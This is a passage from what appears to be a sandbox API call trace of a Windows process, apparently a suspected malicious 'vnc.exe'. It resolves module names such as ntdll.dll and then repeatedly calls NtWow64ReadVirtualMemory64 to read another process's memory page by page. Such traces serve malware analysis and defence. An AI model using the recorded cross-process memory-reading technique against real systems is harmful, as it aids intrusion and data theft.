NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0135.828] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0135.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0135.828] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0135.828] LocalFree (hMem=0x629120) returned 0x0 [0135.828] LocalFree (hMem=0x61df68) returned 0x0 [0135.828] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0135.828] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0135.828] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0135.828] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0135.828] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.828] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0135.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.987] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.987] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.987] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.987] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.987] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.988] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.989] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.990] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.991] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.992] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.993] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.993] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.993] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.993] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.994] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.994] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.994] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.994] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.994] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.995] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.995] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.996] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.996] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.997] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.997] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.997] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 